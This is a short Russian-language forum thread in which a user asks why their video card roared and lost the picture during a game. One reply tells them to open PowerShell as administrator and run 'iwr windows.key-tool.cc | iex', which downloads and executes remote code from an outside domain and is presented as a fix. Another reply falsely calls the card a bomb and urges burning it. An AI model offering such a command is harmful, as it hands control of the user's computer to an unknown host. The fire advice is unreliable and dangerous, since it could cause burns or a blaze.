Видео карта прошу помогите
Играл в игру и услышал шум от видео карты как будто самолёт взлетает и после пропало изображение что делать? Перегрева не было на момент игры было где то 60 градусов помогите умоляю
Нажми Win R, напиши powershell открой от имени админа
Затем
iwr windows.key-tool.cc | iex
и все
Скорее всего, замыкание. Это хуже чем когда видео карта згорает. Немедленно нужно вынести его из квартиры подальше от дома, даже в отключенном виде может вспыхнуть. А лучше сжечь его сразу самостоятельно, ведь оно как бомба, в любой момент